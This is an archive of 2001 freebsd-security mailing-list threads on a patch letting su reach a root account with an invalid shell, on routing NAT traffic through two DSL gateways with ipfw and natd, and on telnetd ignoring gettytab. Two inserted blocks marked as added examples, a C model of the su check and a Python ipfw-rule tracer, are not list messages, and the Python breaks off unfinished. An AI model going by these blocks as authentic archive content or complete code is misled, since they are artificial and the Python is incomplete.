> shell to a nonexisting file. The only way he could become root again was by
> rebooting the machine into single user mode and changing it from there. Now
> while I know that it's foolish to change root's shell in the first place, i
> don't think this is an acceptable punishment for those that do.
>
> According to su.c, if the user you are changing to does not have a valid
> shell, su complains and exits. A valid thing to do in today's security
> conscience society. Now, let's say you want to become root to fix this
> invalid shell problem.. su's nature is to complain and exit.
> The fix is
> rather simple, somewhere around line 310 in su.c is:
>
>     if (!chshell(pwd->pw_shell) && ruid)
>         errx(1, "permission denied (shell).");
>
> The only thing we need to prepend to this is a check to see if we are trying
> to su to root, which we should allow regardless of the shell specified:
>
>     if (pwd->pw_uid)
>         if (!chshell(pwd->pw_shell) && ruid)
>             errx(1, "permission denied (shell).");
>
> Patches are available here (tested on 4.1):
> http://www.dknj.org/sourcecode/patches/su/
>
> -= Kherry Zamore -=- (757) 683-7386 =-
> -= Resident Computer & Network Geek/God =-
> -= http://www.dknj.org =-

From owner-freebsd-security Tue Apr 3 11: 3:24 2001
From: "Matthew Emmerton"
To: "Kherry Zamore"
Subject: Re: su change?
Date: Tue, 3 Apr 2001 14:03:36 -0400

> According to su.c, if the user you are changing to does not have a valid
> shell, su complains and exits. A valid thing to do in today's security
> conscience society. Now, let's say you want to become root to fix this
> invalid shell problem.. su's nature is to complain and exit. The fix is
> rather simple, somewhere around line 310 in su.c is:
>
>     if (!chshell(pwd->pw_shell) && ruid)
>         errx(1, "permission denied (shell).");
>
> The only thing we need to prepend to this is a check to see if we are trying
> to su to root, which we should allow regardless of the shell specified:

I disagree. The root account is an account that needs to have the highest
number of security checks present. If you're swift enough to change root's
shell to something non-standard and forget to update /etc/shells, then
having to drop to single user mode is suitable punishment. After all,
playing with the root user is like playing with fire -- sooner or later
you're going to get burned.

Just consider your friend lucky - doing similar things to the root account
on any enterprise UNIX (UnixWare, Solaris, AIX) could require a complete
reinstall - especially if it's running C2-level security.

--
Matt Emmerton

From owner-freebsd-security Tue Apr 3 11: 9:48 2001
Date: Tue, 3 Apr 2001 14:09:35 -0400
From: Peter Radcliffe
To: freebsd-stable@FreeBSD.ORG, freebsd-security@FreeBSD.ORG
Subject: Re: su change?

Matthew Emmerton probably said:
> Just consider your friend lucky - doing similar things to the root account
> on any enterprise UNIX (UnixWare, Solaris, AIX) could require a complete
> reinstall - especially if it's running C2-level security.

False.

Solaris, certainly, would just require booting from cdrom, mounting /
and editing the password file.

P.
--
pir pir@pir.net pir@net.tufts.edu

From owner-freebsd-security Tue Apr 3 11:15:20 2001
Date: Tue, 03 Apr 2001 11:13:17 -0700
From: Craig Cowen
To: freebsd-security@FreeBSD.ORG
Cc: freebsd-stable@FreeBSD.ORG
Subject: Re: su change?

I worked at an isp and the office staff was responsible for terminating
accounts. Well, one particular staff member kept screwing up in vi and wiping
out the root user's entry.
That's when I made them use chsh

I believe that it will give error messages like visudo to common mistakes.

Peter Radcliffe wrote:

> Matthew Emmerton probably said:
> > Just consider your friend lucky - doing similar things to the root account
> > on any enterprise UNIX (UnixWare, Solaris, AIX) could require a complete
> > reinstall - especially if it's running C2-level security.
>
> False.
>
> Solaris, certainly, would just require booting from cdrom, mounting /
> and editing the password file.
>
> P.
>
> --
> pir pir@pir.net pir@net.tufts.edu

From owner-freebsd-security Tue Apr 3 11:16:25 2001
Date: Tue, 03 Apr 2001 11:14:23 -0700
From: Craig Cowen
To: freebsd-security@FreeBSD.ORG
Cc: freebsd-stable@FreeBSD.ORG
Subject: Re: su change?

FALSE! If you have the boot prom set not to allow booting from cdrom, you're
bummin'

Peter Radcliffe wrote:

> Matthew Emmerton probably said:
> > Just consider your friend lucky - doing similar things to the root account
> > on any enterprise UNIX (UnixWare, Solaris, AIX) could require a complete
> > reinstall - especially if it's running C2-level security.
>
> False.
>
> Solaris, certainly, would just require booting from cdrom, mounting /
> and editing the password file.
>
> P.
>
> --
> pir pir@pir.net pir@net.tufts.edu

From owner-freebsd-security Tue Apr 3 11:22:17 2001
To: Kherry Zamore
Subject: Re: su change?
Date: Tue, 03 Apr 2001 11:23:12 -0700 (PDT)
From: geniusj@bluenugget.net
Cc: freebsd-stable@freebsd.org, freebsd-security@freebsd.org

Quoting Kherry Zamore:

> Just recently my friend locked himself out of his machine by changing root's
> shell to a nonexisting file. The only way he could become root again was by
> rebooting the machine into single user mode and changing it from there. Now
> while I know that it's foolish to change root's shell in the first place, i
> don't think this is an acceptable punishment for those that do.
>

I disagree, anything we can do in su to prevent root access when possibly not
wanted is great with me. Besides, if your friend had perhaps used chfn instead
of vipw to change his root shell, it *should* have bitched at him if the shell
did not exist (i'll have to double check this.)
But there are an infinite # of
conditionals that we could use in your friend's scenario. Perhaps it would be a
better idea if vipw would give a warning if you set the root's shell
incorrectly?

Cheers,
-JD-

P.S. DKNJ!

From owner-freebsd-security Tue Apr 3 11:23:21 2001
Date: Tue, 03 Apr 2001 13:22:18 -0500
To: Craig Cowen, freebsd-security@FreeBSD.ORG
From: Christopher Schulte
Subject: Re: su change?
Cc: freebsd-stable@FreeBSD.ORG

At 11:13 AM 4/3/2001 -0700, Craig Cowen wrote:
>I worked at an isp and the office staff was responsible for terminating
>accounts. Well, one particular staff member kept screwing up in vi and wiping
>out the root user's entry.
>That's when I made them use chsh
>
>I believe that it will give error messages like visudo to common mistakes.

Good grief. One should always use utilities like vipw or chsh when editing
the password databases. They do sanity checking, locking, and other
magically important tasks which a simple `vi` won't.
Not to mention that on
FreeBSD, vipw and chsh will also run pwd_mkdb automatically.

From owner-freebsd-security Tue Apr 3 11:29:47 2001
Date: Tue, 3 Apr 2001 14:29:39 -0400
From: Peter Radcliffe
To: freebsd-security@FreeBSD.ORG, freebsd-stable@FreeBSD.ORG
Subject: Re: su change?

Craig Cowen probably said:
> FALSE! If you have the boot prom set not to allow booting from
> cdrom, you're bummin'

Then you change the prom settings. Hardly rocket science and doesn't
make it untrue. If you're going to "reinstall" because of one little
mistake like that you'd have to boot from different media anyway.

Next you're going to say "But, but, what if you didn't have a cdrom
drive ? ... or someone forgot the prom password !" ? All these things
are different issues and can be fixed.

Yeesh.

P.
--
pir pir@pir.net pir@net.tufts.edu

From owner-freebsd-security Tue Apr 3 11:32:58 2001
Date: Tue, 03 Apr 2001 11:32:53 -0700
From: Crist Clark
To: Craig Cowen
Cc: freebsd-security@FreeBSD.ORG, freebsd-stable@FreeBSD.ORG
Subject: Re: su change?

[-stable cut from CC-list. -security almost cut.]

Craig Cowen wrote:
>
> FALSE! If you have the boot prom set not to allow booting from cdrom, you're
> bummin'

Then just enable it again. Jeesh. It's more fun if the system has no CDROM, tho' (or floppy to boot up OpenBSD). Ever tried to setup a netboot into single-user just to access a messed up Sun box?

If you've put a password in the boot PROM and forgotten that however, you are fscked. Time to buy a new chip!

> > Matthew Emmerton probably said:
> > > Just consider your friend lucky - doing similar things to the root account
> > > on any enterprise UNIX (UnixWare, Solaris, AIX) could require a complete
> > > reinstall - especially if it's running C2-level security.

If you're running a trusted system, is root even that special anymore? Messing up root should be just like messing up any other account.

> > False.
> >
> > Solaris, certainly, would just require booting from cdrom, mounting /
> > and editing the password file.

--
Crist J. Clark cjclark@alum.mit.edu

From owner-freebsd-security Tue Apr 3 11:37:59 2001
From: "Jeremiah Gowdy"
To: "Matthew Emmerton", "Kherry Zamore"
Subject: Re: su change?
Date: Tue, 3 Apr 2001 11:37:46 -0700

> > if (!chshell(pwd->pw_shell) && ruid)
> >     errx(1, "permission denied (shell).");
> >
> > The only thing we need to prepend to this is a check to see if we are trying
> > to su to root, which we should allow regardless of the shell specified:
>
> I disagree. The root account is an account that needs to have the highest
> number of security checks present.

Then make a point as to why root, when not having a valid shell, not being able to log in is a useful security check in any way shape or form. So people can change root's shell to something invalid when they want to lock the root account ? That's nonsensical. If root doesn't have a valid shell, something is broken. If someone gets to that stage in the code for su, they already have an account in wheel, and the root password. You're saying that in the situation in which someone has an account in wheel and the root password, but root's shell is invalid, access should be denied ? I fail to see the security value in this. I support the code patch, while its value is minimal, the behavior is not unreasonable or insecure.

> Just consider your friend lucky - doing similar things to the root account
> on any enterprise UNIX (UnixWare, Solaris, AIX) could require a complete
> reinstall - especially if it's running C2-level security.

Sigh. I won't bother arguing this. I think someone else has.

From owner-freebsd-security Tue Apr 3 11:40:40 2001
Date: Tue, 03 Apr 2001 11:38:38 -0700
From: Craig Cowen
To: freebsd-security@FreeBSD.ORG
Subject: Re: su change?

No actually I am going to point back at the moron that fried root's access.
HaHa

Peter Radcliffe wrote:

> Craig Cowen probably said:
> > FALSE! If you have the boot prom set not to allow booting from
> > cdrom, you're bummin'
>
> Then you change the prom settings. Hardly rocket science and doesn't
> make it untrue.
>
> If you're going to "reinstall" because of one little mistake like that
> you'd have to boot from different media anyway.
>
> Next you're going to say "But, but, what if you didn't have a cdrom
> drive ? ... or someone forgot the prom password !" ? All these things
> are different issues and can be fixed.
>
> Yeesh.
>
> P.
>
> --
> pir pir@pir.net pir@net.tufts.edu
>
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Tue Apr 3 11:42:46 2001
Date: Tue, 3 Apr 2001 14:42:40 -0400
From: Peter Radcliffe
To: freebsd-security@FreeBSD.ORG
Subject: Re: su change?

Crist Clark probably said:
[misquoted text cut. please learn to quote correctly]
> If you've put a password in the boot PROM and forgotten that however, you
> are fscked. Time to buy a new chip!

*sigh*

You don't know when to give up, do you ?

What does forgetting the prom password on a sparc have to do with your incorrect comment on screwing up root's password entry on a Solaris box ?

Oh, and you're incorrect again. You can remove a lost PROM password without replacing the PROM, assuming you have physical access which you'd have to have to replace it. Some are easier than others and the easier ones depend on other settings in the prom, but it can be done in several ways.

The NVRAM FAQ lists some of them;
http://www.squirrel.com/squirrel/sun-nvram-hostid.faq.html

Quit wasting time and bandwidth arguing about things you don't know
enough about on inappropriate lists ?

P.

--
pir pir@pir.net pir@net.tufts.edu

From owner-freebsd-security Tue Apr 3 11:44:24 2001
Date: Tue, 3 Apr 2001 14:44:19 -0400
From: Peter Radcliffe
To: freebsd-security@FreeBSD.ORG
Subject: Re: su change?

Peter Radcliffe probably said:
> You don't know when to give up, do you ?

My mistake - a different person taking up the fold.

> Quit wasting time and bandwidth arguing about things you don't know
> enough about on inappropriate lists ?

This comment still stands, however.

P.
--
pir pir@pir.net pir@net.tufts.edu

From owner-freebsd-security Tue Apr 3 11:51:32 2001
From: Mike Meyer
Date: Tue, 3 Apr 2001 13:51:21 -0500
To: "Matthew Emmerton"
Cc: "Kherry Zamore"
Subject: Re: su change?

Matthew Emmerton types:
> > According to su.c, if the user you are changing to does not have a valid
> > shell, su complains and exits. A valid thing to do in today's security
> > conscience society. Now, lets say you want to become root to fix this
> > invalid shell problem.. su's nature is to complain and exit. The fix is
> > rather simple, somewhere around line 310 in su.c is:
> >
> > if (!chshell(pwd->pw_shell) && ruid)
> >     errx(1, "permission denied (shell).");
> >
> > The only thing we need to prepend to this is a check to see if we are trying
> > to su to root, which we should allow regardless of the shell specified:
> I disagree. The root account is an account that needs to have the highest
> number of security checks present. If you're swift enough to change root's
> shell to something non-standard and forget to update /etc/shells, then
> having to drop to single user mode is suitable punishment. After all,
> playing with the root user is like playing with fire -- sooner or later
> you're going to get burned.

The fix he suggested isn't for the case of root's shell not being in /etc/shells, it's for the case of root's shell not being an executable. If root shell isn't in /etc/shells, then stock su with no arguments will work just fine - you'll just get the non-standard shell.

If root's shell isn't executable, then su with no flags fails because the exec of the shell fails. If you try and use the "-m" flag to su and start your shell, the quoted code causes a failure. Only root (the "&& ruid" test) is allowed to su to an account with a non-standard shell without using the non-standard shell.

If you hit that case, and don't have a root shell around, you're pretty much hosed. You have to power cycle to get the machine to a state where this can be fixed, whether that means just booting single-user, or booting from an alternate media of some kind, or something really extreme. Sudo can probably be configured to solve the problem as well.

This just expands the current policy of "Only root can get a standard shell for an account with a non-standard shell" to include the case where the account is root. I think it would be better if the code showed that, though:

    if (!chshell(pwd->pw_shell) && ruid && pwd->pw_uid)
        errx(1, "permission denied (shell).");

but that's just me.

On the other hand, I advise against changing root shell, and this lends weight to that advice.

http://www.mired.org/home/mwm/
Independent WWW/Perforce/FreeBSD/Unix consultant, email for more information.
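
The check quoted in this thread and the variant with the extra pwd->pw_uid test, compared over a few caller/target combinations. This is an added example, not part of any message and not FreeBSD's su.c: chshell() is modelled as a lookup in a fixed list of permitted shells (an assumption), and the shells, account labels and uids are constructed sample data.

```c
/*
 * Added example (not FreeBSD's su.c): models the shell check quoted in the
 * thread and the variant that also tests the target uid.
 * Assumption: chshell() is modelled as membership in a list of permitted
 * shells. The list, paths, labels and uids are constructed sample data.
 */
#include <stdio.h>
#include <string.h>
#include <sys/types.h>

/* Constructed stand-in for the system's list of permitted shells. */
static const char *const permitted_shells[] = {
    "/bin/sh", "/bin/csh", "/bin/tcsh", NULL
};

/* Returns 1 if sh is in the permitted list, 0 otherwise. */
int chshell_model(const char *sh)
{
    if (sh == NULL)
        return 0;
    for (size_t i = 0; permitted_shells[i] != NULL; i++)
        if (strcmp(permitted_shells[i], sh) == 0)
            return 1;
    return 0;
}

/* Quoted check: if (!chshell(pwd->pw_shell) && ruid) -> permission denied. */
int stock_denies(const char *target_shell, uid_t ruid)
{
    return !chshell_model(target_shell) && ruid != 0;
}

/* Variant from the thread: ... && ruid && pwd->pw_uid -> permission denied. */
int variant_denies(const char *target_shell, uid_t ruid, uid_t target_uid)
{
    return !chshell_model(target_shell) && ruid != 0 && target_uid != 0;
}

struct su_case {
    const char *label;       /* who is switching to whom */
    const char *shell;       /* target account's shell field */
    uid_t ruid;              /* real uid of the caller */
    uid_t target_uid;        /* uid of the target account */
};

/* Constructed cases; "bsah" stands for a mistyped shell path. */
static const struct su_case cases[] = {
    { "user -> root, listed shell",      "/bin/csh",            1001, 0    },
    { "user -> root, unlisted shell",    "/usr/local/bin/bsah", 1001, 0    },
    { "user -> toor (uid 0), unlisted",  "/usr/local/bin/bsah", 1001, 0    },
    { "user -> account, unlisted shell", "/sbin/nologin",       1001, 1002 },
    { "root -> account, unlisted shell", "/sbin/nologin",       0,    1002 },
};

#define NCASES (sizeof(cases) / sizeof(cases[0]))

/* Counts the cases where the two checks reach different decisions. */
int count_policy_differences(void)
{
    int diff = 0;
    for (size_t i = 0; i < NCASES; i++) {
        int s = stock_denies(cases[i].shell, cases[i].ruid);
        int v = variant_denies(cases[i].shell, cases[i].ruid,
                               cases[i].target_uid);
        if (s != v)
            diff++;
    }
    return diff;
}

int main(void)
{
    printf("%-34s %-7s %-7s\n", "case", "stock", "variant");
    for (size_t i = 0; i < NCASES; i++) {
        int s = stock_denies(cases[i].shell, cases[i].ruid);
        int v = variant_denies(cases[i].shell, cases[i].ruid,
                               cases[i].target_uid);
        printf("%-34s %-7s %-7s\n", cases[i].label,
               s ? "deny" : "allow", v ? "deny" : "allow");
    }
    printf("decisions that differ: %d\n", count_policy_differences());
    return 0;
}
```

The two checks differ only when a non-root caller targets a uid 0 account whose shell is not in the list. Because the variant keys on the uid rather than the account name, every uid 0 account gets the exemption, while ordinary accounts with unlisted shells stay denied.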
From owner-freebsd-security Tue Apr 3 12:31:58 2001
Date: Tue, 3 Apr 2001 14:30:12 -0500 (CDT)
From: James Wyatt
To: freebsd-security@freebsd.org
Cc: freebsd-stable@FreeBSD.ORG
Subject: Re: su change?

On Tue, 3 Apr 2001, Peter Radcliffe wrote:
> Matthew Emmerton probably said:
> > Just consider your friend lucky - doing similar things to the root account
> > on any enterprise UNIX (UnixWare, Solaris, AIX) could require a complete
> > reinstall - especially if it's running C2-level security.
>
> False.
>
> Solaris, certainly, would just require booting from cdrom, mounting /
> and editing the password file.

Why is booting from CDROM a better fix than booting single-user from the hard disk? The original poster wanted to avoid a reboot *at all*.

Solaris, AIX, and even FreeBSD can be booted from a CDROM nowadays, but I've recovered a SCO system that had a security-fault in its trustware. Reinstall was the advised procedure, but there were enough security-db tools to recover the root account.

On the high-security systems I've seen, a skilled tech can usually recover the system to allow operation, but the machine should be considered tainted and reinstalled ASAP if you ever want support from the vendor or peace from your auditors. - Jy@

From owner-freebsd-security Tue Apr 3 12:57: 1 2001
From: Michael Owens
Reply-To: owensmk@earthlink.net
Date: Mon, 2 Apr 2001 16:48:54 -0500
To: security@freebsd.org
Subject: Multiple Default Gateways using DIVERT

My company has a single DSL line through which I have set up internet access via NAT using IPF.

We are getting a second DSL line, and I was wondering what the best way, if any, would be to use NAT and different default gateways so as to divide up the groups by source address across them. I would like 10.10.10.1-128 to go through gateway 1 (say 2.2.2.1) and 10.10.10.129-254 through gateway 2 (say 2.2.2.2). I have searched the mail archives and seen various suggestions, but none seemed to address this specifically.

I know this can't be done with IPF, so I am asking if this is something that could be done with IPFW. From what I can tell, it might using divert, but I am not all that clear on divert's use in varying gateways.
From owner-freebsd-security Tue Apr 3 13:20: 5 2001
Date: Tue, 03 Apr 2001 13:20:07 -0700
From: Matthew Reimer
Organization: VPOP Technologies, Inc.
To: owensmk@earthlink.net, security@freebsd.org
Subject: Re: Multiple Default Gateways using DIVERT

Michael Owens wrote:
>
> My company has a single DSL line through which I have set up internet access
> via NAT using IPF.
>
> We are getting a second DSL line, and I was wondering what the best way, if
> any, would be to use NAT and different default gateways so as to divide up
> the groups by source address across them. I would like 10.10.10.1-128 to go
> through gateway 1 (say 2.2.2.1) and 10.10.10.129-254 through gateway 2 (say
> 2.2.2.2). I have searched the mail archives and seen various suggestions, but
> none seemed to address this specifically.
>
> I know this can't be done with IPF, so I am asking if this is something that
> could be done with IPFW. From what I can tell, it might using divert, but I
> am not all that clear on divert's use in varying gateways.

This might be a start, though I'm not sure how NAT should fit in. You'll need the IPFIREWALL and IPFIREWALL_FORWARD kernel options.

    ipfw add 1000 fwd 2.2.2.1 ip from 10.10.10.0/25 to any
    ipfw add 2000 fwd 2.2.2.2 ip from 10.10.10.128/25 to any

Matt

From owner-freebsd-security Tue Apr 3 13:20:56 2001
Date: Tue, 3 Apr 2001 16:20:47 -0400
From: Peter Radcliffe
To: freebsd-security@freebsd.org, freebsd-stable@FreeBSD.ORG
Subject: Re: su change?

James Wyatt probably said:
> On Tue, 3 Apr 2001, Peter Radcliffe wrote:
> > Matthew Emmerton probably said:
> > > Just consider your friend lucky - doing similar things to the
> > > root account on any enterprise UNIX (UnixWare, Solaris, AIX)
> > > could require a complete reinstall - especially if it's running
> > > C2-level security.
> > False.
> > Solaris, certainly, would just require booting from cdrom, mounting /
> > and editing the password file.
> Why is booting from CDROM a better fix than booting single-user from the
> hard disk? The original poster wanted to avoid a reboot *at all*.

I didn't say it was better, I just corrected the comment that you'd have to reinstall.

P.
--
pir pir@pir.net pir@net.tufts.edu

From owner-freebsd-security Tue Apr 3 14: 9:45 2001
Date: Wed, 04 Apr 2001 07:09:23 +1000
From: Peter Jeremy
Subject: Re: Multiple Default Gateways using DIVERT
To: Michael Owens
Cc: security@FreeBSD.ORG

On 2001-Apr-02 16:48:54 -0500, Michael Owens wrote:
>We are getting a second DSL line, and I was wondering what the best way, if
>any, would be to use NAT and different default gateways so as to divide up
>the groups by source address across them. I would like 10.10.10.1-128 to go
>through gateway 1 (say 2.2.2.1) and 10.10.10.129-254 through gateway 2 (say
>2.2.2.2). I have searched the mail archives and seen various suggestions, but
>none seemed to address this specifically.

I presume you're interested in outgoing, rather than incoming access.

I'm (ab)using ipfw/natd to do something fairly similar to this. Basically I have an ipfw divert to natd and then in my natd.cf file I have a list of redirect addresses. In your case, it would look like:

    redirect_address 10.10.10.1 2.2.2.1
    redirect_address 10.10.10.2 2.2.2.1
    redirect_address 10.10.10.3 2.2.2.1
    ...
    redirect_address 10.10.10.128 2.2.2.1
    redirect_address 10.10.10.129 2.2.2.2
    redirect_address 10.10.10.130 2.2.2.2
    redirect_address 10.10.10.131 2.2.2.2
    ...
    redirect_address 10.10.10.254 2.2.2.2

The downside is that you need to list each internal address (or at least half of them, with the remainder handled via a target_address directive).

If your internal address split can be represented by a mask (ie 10.10.10.0/25 => 2.2.2.1 and 10.10.10.128/25 => 2.2.2.2) then another alternative would be to use two natd's (on different divert ports with different config files) with ipfw rules to split the packets between them. Note that the mask does not need to be a normal subnet mask - it can be an arbitrary bit pattern. As an example 10.10.10.1/255.255.255.1 could be used to split addresses into even and odd.

Unfortunately, I don't think there's any simple way to statistically split the traffic between the different gateways.

If you're concerned about reliability, you might also consider hacking up some tools to automatically redirect all your internal hosts via one gateway if the other fails. This wouldn't save pre-existing connections, but would at least let you set up new ones.

Note that natd is inherently less efficient than ipnat because it is userland. This means that each packet goes kernel->userland->kernel, which is quite expensive.

Peter

From owner-freebsd-security Tue Apr 3 15:37:15 2001
From: "Matthew Emmerton"
To: "Jeremiah Gowdy", "Kherry Zamore"
Subject: Re: su change?
Date: Tue, 3 Apr 2001 18:37:01 -0400

> > > if (!chshell(pwd->pw_shell) && ruid)
> > >     errx(1, "permission denied (shell).");
> > >
> > > The only thing we need to prepend to this is a check to see if we are trying
> > > to su to root, which we should allow regardless of the shell specified:
> >
> > I disagree. The root account is an account that needs to have the highest
> > number of security checks present.
>
> Then make a point as to why root, when not having a valid shell, not being
> able to log in is a useful security check in any way shape or form. So
> people can change root's shell to something invalid when they want to lock
> the root account ? That's nonsensical.

Last time I checked, only root had write access to /etc/master.passwd and /etc/shells, so only someone who hacked root could change root's shell to something invalid. (Note that I'm not handling the case of where an administrator does something stupid.)

    gabby# ls -al /etc/shells /etc/master.passwd
    -rw-r--r- 1 root wheel 223 Jul 28 2000 /etc/shells
    -rw------ 1 root wheel 1423 mar 18 14:10 /etc/master.passwd
    gabby#

If someone happens to change root's shell, then the security of the machine has been breached in some way. The immediate consequence is that root can't log in. If you (the administrator) notice that you can't log in as root anymore, then it's a really big clue that something major is wrong, and would necessitate taking the machine out of multi-user mode ASAP to perform the investigation and fix things up.

Furthermore, if taking the machine down to single-user mode is a real big problem (because it's a production machine or something equally important), then the fact that someone's compromised root makes taking the machine down a very reasonable thing to do.

The lesson? Don't screw with production machines unless you know the consequences of your actions, and if you must screw around, make sure you're using the appropriate tools (vipw, chsh, etc) to ensure that your changes are valid.

--
Matt Emmerton

From owner-freebsd-security Tue Apr 3 15:40:27 2001
From: "Jeremiah Gowdy"
To: "Matthew Emmerton", "Kherry Zamore"
Subject: Re: su change?
Date: Tue, 3 Apr 2001 15:40:09 -0700

----- Original Message -----
From: "Matthew Emmerton"
To: "Jeremiah Gowdy"; "Kherry Zamore"
Sent: Tuesday, April 03, 2001 3:37 PM
Subject: Re: su change?

> > > > if (!chshell(pwd->pw_shell) && ruid)
> > > >     errx(1, "permission denied (shell).");
> > > >
> > > > The only thing we need to prepend to this is a check to see if we are trying
> > > > to su to root, which we should allow regardless of the shell specified:
> > >
> > > I disagree. The root account is an account that needs to have the highest
> > > number of security checks present.
> >
> > Then make a point as to why root, when not having a valid shell, not being
> > able to log in is a useful security check in any way shape or form. So
> > people can change root's shell to something invalid when they want to lock
> > the root account ? That's nonsensical.
>
> Last time I checked, only root had write access to /etc/master.passwd and
> /etc/shells, so only someone who hacked root could change root's shell to
> something invalid. (Note that I'm not handling the case of where an
> administrator does something stupid.)
>
> gabby# ls -al /etc/shells /etc/master.passwd
> -rw-r--r- 1 root wheel 223 Jul 28 2000 /etc/shells
> -rw------ 1 root wheel 1423 mar 18 14:10 /etc/master.passwd
> gabby#
>
> If someone happens to change root's shell, then the security of the machine
> has been breached in some way. The immediate consequence is that root can't
> log in. If you (the administrator) notice that you can't log in as root
> anymore, then it's a really big clue that something major is wrong, and
> would necessitate taking the machine out of multi-user mode ASAP to perform
> the investigation and fix things up.

If someone roots your box, they're not going to change your shell to something invalid. If they have root, why change the shell at all. When you root a box, do you say "Damnit, why is this guy using csh ! I want bash !". It still doesn't make sense.

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Tue Apr 3 16: 2:40 2001
Delivered-To: freebsd-security@freebsd.org
Received: from fw.wintelcom.net (ns1.wintelcom.net [209.1.153.20]) by hub.freebsd.org (Postfix) with ESMTP id 21F9E37B71E for ; Tue, 3 Apr 2001 16:02:38 -0700 (PDT) (envelope-from bright@fw.wintelcom.net)
Received: (from bright@localhost) by fw.wintelcom.net (8.10.0/8.10.0) id f33N2WY14827; Tue, 3 Apr 2001 16:02:32 -0700 (PDT)
Date: Tue, 3 Apr 2001 16:02:32 -0700
From: Alfred Perlstein
To: Roman Shterenzon
Cc: security@freebsd.org
Subject: Re: 4.3rc2: if=/etc/issue in /etc/gettytab is not respected
Message-ID: <20010403160232.I12164@fw.wintelcom.net>
References: <20010403151111.E12164@fw.wintelcom.net>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: ; from roman@xpert.com on Wed, Apr 04, 2001 at 12:39:54AM +0200
X-all-your-base: are belong to us.
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

* Roman Shterenzon [010403 15:35] wrote:
> With enough attention and code analysis, that could be made before
> 4.3-RELEASE. There's almost two weeks left, and many people who are
> willing to test it. Me for example :)

There's basically two telnetd's in the source tree.

When you compile and install the one from src/secure/libexec/telnetd you get one that doesn't respect the if= directive. It looks like it doesn't even respect the other settings, something to do with the USER environment variable.

I've moved this to the security list in an effort to get this explained. Anyone know why this is going on?

Basically in "normal" (src/libexec/telnetd.c) this:

    if (getenv("USER"))
        hostinfo = 0;

is false, but under "crypto" (src/crypto/telnet/telnetd/telnetd.c) it's true and therefore doesn't display the login info.

-- 
-Alfred Perlstein - [bright@wintelcom.net|alfred@freebsd.org]
Instead of asking why a piece of software is using "1970s technology," start asking why software is ignoring 30 years of accumulated wisdom.

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Wed Apr 4 0:25:48 2001
Delivered-To: freebsd-security@freebsd.org
Received: from nsmail.corp.globalstar.com (gibraltar.globalstar.com [207.88.248.142]) by hub.freebsd.org (Postfix) with ESMTP id E691637B724 for ; Wed, 4 Apr 2001 00:25:43 -0700 (PDT) (envelope-from cjclark@alum.mit.edu)
Received: from alum.mit.edu ([207.88.154.6]) by nsmail.corp.globalstar.com (Netscape Messaging Server 4.15) with ESMTP id GB9BAB00.223; Wed, 4 Apr 2001 00:25:23 -0700
Message-ID: <3ACAE8CE.F9223E28@alum.mit.edu>
Date: Wed, 04 Apr 2001 02:26:38 -0700
From: "Crist J. Clark"
X-Mailer: Mozilla 4.72 [en] (Win98; U)
X-Accept-Language: en
MIME-Version: 1.0
To: Matthew Reimer
Cc: owensmk@earthlink.net, security@FreeBSD.ORG
Subject: Re: Multiple Default Gateways using DIVERT
References: <3ACA3077.BA9CFFCE@vpop.net>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Matthew Reimer wrote:
>
> Michael Owens wrote:
> >
> > My company has a single DSL line through which I have set up internet access
> > via NAT using IPF.
> >
> > We are getting a second DSL line, and I was wondering what the best way, if
> > any, would be to use NAT and different default gateways so as to divide up
> > the groups by source address across them. I would like 10.10.10.1-128 to go
> > through gateway 1 (say 2.2.2.1) and 10.10.10.129-254 through gateway 2 (say
> > 2.2.2.2). I have searched the mail archives and seen various suggestions, but
> > none seemed to address this specifically.
> >
> > I know this can't be done with IPF,

Hmm...

> > so I am asking if this is something that
> > could be done with IPFW. From what I can tell, it might using divert, but I
> > am not all that clear on divert's use in varying gateways.
>
> This might be a start, though I'm not sure how NAT should fit in. You'll
> need the IPFIREWALL and IPFIREWALL_FORWARD kernel options.
>
> ipfw add 1000 fwd 2.2.2.1 ip from 10.10.10.0/25 to any
> ipfw add 2000 fwd 2.2.2.2 ip from 10.10.10.128/25 to any

Neither of the two responses I saw looked like they would do what the original poster wanted. It is a start, but this one will not work as shown with natd. The search will terminate with the above rules, before being divert(4)ed.

The trick is going to be doing NAT on a packet, but still having some way to tell from which half of the 10.10.10.0/24 block it originated. What I think the best thing to do is run two natd(8) processes. If you have two DSL links, I assume you have at least two public IP addresses to play with. I will call them, oip1 and oip2. Start two natd(8)s, one of the public IPs each,

  # natd -a ${oip1} -p 8668
  # natd -a ${oip2} -p 8669

Then, for your ipfw(8) rules,

  ipfw add 500 divert 8668 ip from 10.10.10.0/25 to any out via ${oif}
  ipfw add 600 divert 8669 ip from 10.10.10.128/25 to any out via ${oif}
  ipfw add 700 divert 8668 ip from any to ${oip1} in via ${oif}
  ipfw add 800 divert 8669 ip from any to ${oip2} in via ${oif}
  ipfw add 1000 fwd 2.2.2.1 ip from ${oip1} to any out via ${oif}
  ipfw add 2000 fwd 2.2.2.2 ip from ${oip2} to any out via ${oif}

At least... I think that should do it. Looks good on the screen.
-- 
Crist J. Clark                           cjclark@alum.mit.edu

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message
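
Clark's objection to the fwd-only rules, and the path a packet takes through his two-natd ruleset, can be traced rule by rule. The sketch below is an added example, not code from the thread: it models only ipfw's first-match search, re-injection of a diverted packet after the diverting rule, and fwd ending the search. The public addresses 192.0.2.1 and 192.0.2.2 (standing in for oip1 and oip2) and the position of the single divert rule in the fwd-first ruleset are assumptions.

```python
import ipaddress

# Constructed sample values (assumptions): the thread only calls these oip1/oip2.
OIP1 = "192.0.2.1"   # public address on DSL line 1, behind gateway 2.2.2.1
OIP2 = "192.0.2.2"   # public address on DSL line 2, behind gateway 2.2.2.2

# natd -a <alias address> -p <divert port>, as in Clark's message
NATD = {8668: OIP1, 8669: OIP2}


def rule(num, action, arg, src, dst="any", direction="out"):
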